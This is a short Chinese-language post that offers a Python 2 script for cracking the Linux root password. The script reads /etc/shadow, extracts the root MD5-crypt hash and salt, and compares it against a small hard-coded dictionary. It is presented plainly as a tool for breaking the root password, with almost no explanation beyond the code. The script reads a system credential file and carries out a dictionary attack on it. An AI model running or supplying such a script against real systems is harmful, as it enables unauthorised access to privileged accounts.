Linux系列的很多操作系統是採用MD5加密用戶密碼的,加密的過程是單向的,所以要破解只能採用暴力破解法。
下面分享個程序來破解root用戶密碼。
程序會遍歷字典文件中的每個密碼,加密後和/etc/shadow中的密碼匹配,如果相同則返回成功。
#!/usr/bin/env python
import crypt
import sys
import re
dic = [
'cookie',
'test',
'fuckyou'
]
passwordfile = '/etc/shadow'
def getrootpass():
f = open(passwordfile, 'r')
for line in f.readlines():
if 'root:' in line :
rootpass = line.split(":")[1]
if rootpass is None:
print "cannot find root user"
sys.exit(1)
return rootpass
def getsalt():
rootpass = getrootpass()
if rootpass:
salt = re.match("(\$1\$.*\$)", rootpass)
if salt != None :
salt = salt.groups(1)[0]
return salt
def crack():
for passwd in dic:
testpass = crypt.crypt(passwd, str(getsalt()))
if testpass == getrootpass():
print "crack root password successful !\n root password is :\n%s" % passwd
sys.exit(0)
print "could not crack root password"
crack()